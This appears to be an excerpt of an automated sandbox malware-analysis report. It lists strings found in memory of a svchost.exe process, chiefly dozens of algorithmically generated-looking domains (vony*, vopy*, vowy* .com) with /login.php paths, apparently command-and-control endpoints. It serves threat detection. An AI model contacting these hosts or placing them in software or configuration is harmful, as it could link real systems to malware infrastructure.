Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonymuf.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325498540.0000000003381000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonypyf.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyqok.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198550241.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198486951.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyryc.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772865274.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2779851775.00000000087FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785600778.00000000087FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381391655.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771520849.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377032828.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2777187340.0000000008705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopycoc.com/http://gatycis.com/http://ganyrew.com/http://pupycop.com/H
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347214715.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopycom.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopygat.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopyjac.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopyjuf.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582641786.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopymyc.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopyput.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2646474973.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582543248.00000000087FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowydic.com/login.php
Source: svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowygem.com/
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowygem.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowykuc.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowymom.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowymyk.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowypek.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297525559.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296876973.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297408732.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowyqoc.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowyqyt.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowyrec.com/login.php
Source: svchost.exe, 00000002.00000003.2347368990.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowyrif.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336766554.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337435190.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335316915.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vowyzam.com/login.php
Source: svchost.exe, svchost.exe, 00000002.00000003.2155014934.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.0000000008730000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301297891.0000000003336000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395119588.0000000005815000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2804111007.0000000003382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2291261524.0000000003334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.000000000872D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3387030843.0000000000877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2383172767.0000000005839000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2777502363.000000000570E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368015622.0000000005847000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394725639.000000000587C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282302761.0000000008736000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320199139.000000000087E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434070783.000000000086F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259782949.000000000087A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2516528326.000000000580A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329663248.000000000872F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.0000000008730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
